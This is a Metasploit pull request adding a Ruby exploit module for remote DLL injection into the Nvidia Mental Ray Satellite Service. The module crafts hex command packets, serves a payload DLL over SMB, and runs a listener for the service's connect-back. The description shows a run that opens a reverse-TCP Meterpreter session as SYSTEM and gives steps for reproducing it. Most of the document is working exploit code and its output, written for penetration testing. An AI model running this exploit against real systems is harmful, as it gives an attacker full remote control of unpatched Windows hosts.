### PR TITLE
Nvidia mental ray take 3

### DIFF
--- a/modules/exploits/windows/misc/nvidia_mental_ray.rb
+++ b/modules/exploits/windows/misc/nvidia_mental_ray.rb
@@ -1,0 +1,183 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::Remote::SMB::Server::Share
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name' => 'Nvidia Mental Ray Satellite Service Arbitrary DLL Injection',
+      'Description' => %q{
+        The Nvidia Mental Ray Satellite Service listens for control commands on port 7414.
+        When it receives the command to load a DLL (via an UNC path) it will try to
+        connect back to the host on port 7514. If a TCP connection is successful it will
+        then attempt to load a DLL.
+
+        Tested on Win7 x64 against v3.11.1
+      },
+      'License' => MSF_LICENSE,
+      'Author' =>
+        [
+          'Luigi Auriemma', # Discovery
+          'Donato Ferrante', # Discovery
+          'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module
+        ],
+      'References' =>
+        [
+          [ 'URL', 'http://revuln.com/files/ReVuln_NVIDIA_mental_ray.pdf' ]
+        ],
+      'Stance' => Msf::Exploit::Stance::Aggressive,
+      'Platform' => 'win',
+      'Targets' =>
+        [
+          [ 'Windows x64',
+            {
+              'Arch' => ARCH_X86_64
+            }
+          ],
+        ],
+      'Privileged' => true,
+      'DisclosureDate' => 'Dec 10 2013',
+      'DefaultTarget' => 0))
+
+    register_options([
+                         Opt::RPORT(7414),
+                         OptInt.new('LISTEN_PORT', [ true, 'The port to catch the return connection on', 7514]),
+                         OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
+                     ], self.class)
+
+  end
+
+  def primer
+    self.file_contents = generate_payload_dll
+    print_status("File available on #{unc}...")
+
+    print_status("Trying to execute remote DLL...")
+    send_exploit
+  end
+
+  def setup
+    super
+
+    # These lengths are required, although we specify the UNC path
+    # length in the exploit, the header probably has another length
+    # value we don't adjust.
+    self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll"
+    self.share = Rex::Text.rand_text_alpha(5)
+
+    unless file_name =~ /\.dll$/
+      fail_with(Failure::BadConfig, "FILE_NAME must end with .dll")
+    end
+  end
+
+  def exploit
+    begin
+      Timeout.timeout(datastore['SMB_DELAY']) {super}
+    rescue Timeout::Error
+      # do nothing... just finish exploit and stop smb server...
+    end
+  end
+
+  def send_exploit
+    # No idea what most of this hello is...
+    hello = "6c72696d3030303030203030303031203136333932203037353134203030303031203039303936203030303030207261796d7"
+    hello << "36734302d332e31312e312e345f5f5f5f5f5f5f5f5f5f5f5f0020007c5241593331317c53554231000100000000e90300000"
+    hello << "0000000ffffffffffffffff1807000000000000dc10d7fdfe0700003018a40500000000e73654fffe070000c0afcd0000000"
+    hello << "000ffffffffffffffffffffffffffffffff18070000000000007014a70100000000763754fffe0700000000000000000000f"
+    hello << "035ae01000000003036ae0100000000da2152fffe0700003036ae0100000000a33754fffe070000000000000000000000000"
+    hello << "00000000000ffffffffffffffffffffffffffffffff3036ae0100000000c40e53fffe0700007014a70100000000180700000"
+    hello << "0000000000000000000000000000000000000000000000000000000020000000000000001000000000000005035440400000"
+    hello << "0008013a7010000000090b3cd00000000001807000000000000b929d80300000000000000000000000018070000000000009"
+    hello << "0b3cd000000000010cda701000000000000000000000000010100000000000000b3cd0000000000060000000000000066000"
+    hello << "200000000000000020000000a0008000000a01a0fe73d00cf118ca300804034ae01000000000100000000000000000000000"
+    hello << "0000000030000000a000000"
+
+    hello = Rex::Text.hex_to_raw(hello)
+
+    # Start of command - again no idea what this is...
+    load_dll =  Rex::Text.hex_to_raw("4ed32cb1740500000000000001130013")
+
+    # Length of path string including null byte
+    load_dll << [unc.length+1].pack('V')
+
+    # Data type?
+    load_dll << [2].pack('V')
+
+    # Assembly Load?
+    load_dll << "AL"
+    load_dll << unc << "\x00"
+
+    # Some padding at the end...
+    load_dll << rand_text_alpha(1386 - unc.length)
+
+    # We have to start a second listening port although we dont actually care about
+    # handling client connections it appears as long as the service can make a
+    # connection its happy and will move onto the DLL loading
+    create_listen_port
+    vprint_status("Connecting to target and sending commands")
+    connect
+    sock.put(hello)
+    sock.put(load_dll)
+    print_status("Instructed the service to load #{unc}...")
+  end
+
+  def create_listen_port
+    port = datastore['LISTEN_PORT']
+
+    comm = datastore['ListenerComm']
+    if comm == "local"
+      comm = ::Rex::Socket::Comm::Local
+    else
+      comm = nil
+    end
+
+    @listener = Rex::Socket::TcpServer.create(
+        'LocalHost' => datastore['SRVHOST'],
+        'LocalPort' => port,
+        'Comm'      => comm,
+        'Context'   => {
+            'Msf'        => framework,
+            'MsfExploit' => self,
+        }
+    )
+
+    # Register callbacks
+    @listener.on_client_connect_proc = Proc.new { |cli|
+      add_socket(cli)
+      begin
+        print_status("#{cli.peerhost.ljust(16)} #{self.shortname} - Connected to Listener on #{port}...")
+      ensure
+        remove_socket(cli)
+      end
+    }
+
+    @listener.start
+    vprint_status("Started listening on TCP port #{port}")
+
+  end
+
+  def cleanup
+    super
+    return unless @listener
+
+    begin
+      @listener.deref if @listener.kind_of?(Rex::Service)
+      if @listener.kind_of?(Rex::Socket)
+        @listener.close
+        @listener.stop
+      end
+      @listener = nil
+    rescue ::Exception
+    end
+  end
+end
+

--- a/modules/exploits/windows/misc/nvidia_mental_ray.rb
+++ b/modules/exploits/windows/misc/nvidia_mental_ray.rb
@@ -1,12 +1,11 @@
 ##
-# This module requires Metasploit: http//metasploit.com/download
+# This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
-
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::Tcp
@@ -20,7 +19,7 @@ class Metasploit3 < Msf::Exploit::Remote
         The Nvidia Mental Ray Satellite Service listens for control commands on port 7414.
         When it receives the command to load a DLL (via an UNC path) it will try to
         connect back to the host on port 7514. If a TCP connection is successful it will
-        then attempt to load a DLL.
+        then attempt to load the DLL.
 
         Tested on Win7 x64 against v3.11.1
       },
@@ -36,25 +35,22 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'URL', 'http://revuln.com/files/ReVuln_NVIDIA_mental_ray.pdf' ]
         ],
       'Stance' => Msf::Exploit::Stance::Aggressive,
-      'Platform' => 'win',
-      'Targets' =>
+      'Platform'       => 'win',
+      'Targets'        =>
         [
-          [ 'Windows x64',
-            {
-              'Arch' => ARCH_X86_64
-            }
-          ],
+          [ 'Windows x64', { 'Arch' => [ ARCH_X86_64 ] } ]
         ],
       'Privileged' => true,
       'DisclosureDate' => 'Dec 10 2013',
       'DefaultTarget' => 0))
 
     register_options([
-                         Opt::RPORT(7414),
-                         OptInt.new('LISTEN_PORT', [ true, 'The port to catch the return connection on', 7514]),
-                         OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
-                     ], self.class)
+      Opt::RPORT(7414),
+      OptInt.new('LISTEN_PORT', [ true, 'The port to catch the return connection on', 7514]),
+      OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
+    ], self.class)
 
+    deregister_options('FILE_CONTENTS', 'FILE_NAME', 'SHARE')
   end
 
   def primer
@@ -73,15 +69,11 @@ class Metasploit3 < Msf::Exploit::Remote
     # value we don't adjust.
     self.file_name = "#{Rex::Text.rand_text_alpha(7)}.dll"
     self.share = Rex::Text.rand_text_alpha(5)
-
-    unless file_name =~ /\.dll$/
-      fail_with(Failure::BadConfig, "FILE_NAME must end with .dll")
-    end
   end
 
   def exploit
     begin
-      Timeout.timeout(datastore['SMB_DELAY']) {super}
+      Timeout.timeout(datastore['SMB_DELAY']) { super }
     rescue Timeout::Error
       # do nothing... just finish exploit and stop smb server...
     end
@@ -107,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
     load_dll =  Rex::Text.hex_to_raw("4ed32cb1740500000000000001130013")
 
     # Length of path string including null byte
-    load_dll << [unc.length+1].pack('V')
+    load_dll << [unc.length + 1].pack('V')
 
     # Data type?
     load_dll << [2].pack('V')
@@ -120,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Remote
     load_dll << rand_text_alpha(1386 - unc.length)
 
     # We have to start a second listening port although we dont actually care about
-    # handling client connections it appears as long as the service can make a
+    # handling client connections. It appears as long as the service can make a
     # connection its happy and will move onto the DLL loading
     create_listen_port
     vprint_status("Connecting to target and sending commands")
@@ -145,24 +137,25 @@ class Metasploit3 < Msf::Exploit::Remote
         'LocalPort' => port,
         'Comm'      => comm,
         'Context'   => {
-            'Msf'        => framework,
-            'MsfExploit' => self,
+          'Msf'        => framework,
+          'MsfExploit' => self
         }
     )
 
     # Register callbacks
-    @listener.on_client_connect_proc = Proc.new { |cli|
+    @listener.on_client_connect_proc = proc { |cli|
       add_socket(cli)
       begin
-        print_status("#{cli.peerhost.ljust(16)} #{self.shortname} - Connected to Listener on #{port}...")
+        print_status("#{cli.peerhost.ljust(16)} #{shortname} - Connected to Listener on #{port}...")
       ensure
+        # Need to close the socket for the SMB request to be
+        # initiated...
         remove_socket(cli)
       end
     }
 
     @listener.start
     vprint_status("Started listening on TCP port #{port}")
-
   end
 
   def cleanup
@@ -170,8 +163,8 @@ class Metasploit3 < Msf::Exploit::Remote
     return unless @listener
 
     begin
-      @listener.deref if @listener.kind_of?(Rex::Service)
-      if @listener.kind_of?(Rex::Socket)
+      @listener.deref if @listener.is_a?(Rex::Service)
+      if @listener.is_a?(Rex::Socket)
         @listener.close
         @listener.stop
       end
@@ -180,4 +173,3 @@ class Metasploit3 < Msf::Exploit::Remote
     end
   end
 end
-


### PR DESCRIPTION
Vulnerable Software: http://images.autodesk.com/adsk/files/Maya_mrsat3.11.1_Win_64bit.exe

Re-did this module to take advantage of the SMBFileServer mixin and help to provide some verification that it works.

This module serves a DLL over SMB. It also has to listen on a second socket to catch a connection from the Satellite which is initiated after we send the HELLO packet.

After we have sent the HELLO, and have received the client connection, we can send the command to load the DLL via an UNC path.
## Example Run

```
msf exploit(nvidia_mental_ray) > exploit

[*] Started reverse handler on 192.168.1.151:4444 
[*] Generating our malicious binary...
[*] Ready to deliver your payload on \\192.168.1.151\xAGZS\vzrVQhC.dll
[*] Instructed the service to load \\192.168.1.151\xAGZS\vzrVQhC.dll...
[*] 192.168.1.117    nvidia_mental_ray - Connected to Listener
[*] Sending stage (971264 bytes) to 192.168.1.117
[*] Meterpreter session 1 opened (192.168.1.151:4444 -> 192.168.1.117:54671) at 2014-03-08 16:39:14 +0000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
```
## Verification
- [x] Land https://github.com/rapid7/metasploit-framework/pull/3074
- [x] Land https://github.com/rapid7/metasploit-framework/pull/3075
- [x] Install Mental Ray Service and reboot (or start service)
- [x] SET PAYLOAD windows/x64/meterpreter/reverse_tcp (Automatic Payload detection doesn't work?)
- [x] Fire exploit
## Reproduction Steps

Steps to generate the network traffic:

Install Autodesk Maya: http://www.autodesk.com/products/autodesk-maya/free-trial
Configure as per: http://seithcg.com/wordpress/?page_id=64
Install satellite service: http://images.autodesk.com/adsk/files/Maya_mrsat3.11.1_Win_64bit.exe

Use the following command to generate some networked rendering:
`"c:\Program Files\Autodesk\Maya2014\bin\Render.exe" -r mr -s 1 -e 1 -b 1 -v 5 -rnm false -x 1024 -y 435 -rp true -of tif "C:\Program Files\Autodesk\Maya2014\presets\toon\examples\CalligraphicLine.ma"`

Monitor the generated traffic in Wireshark.
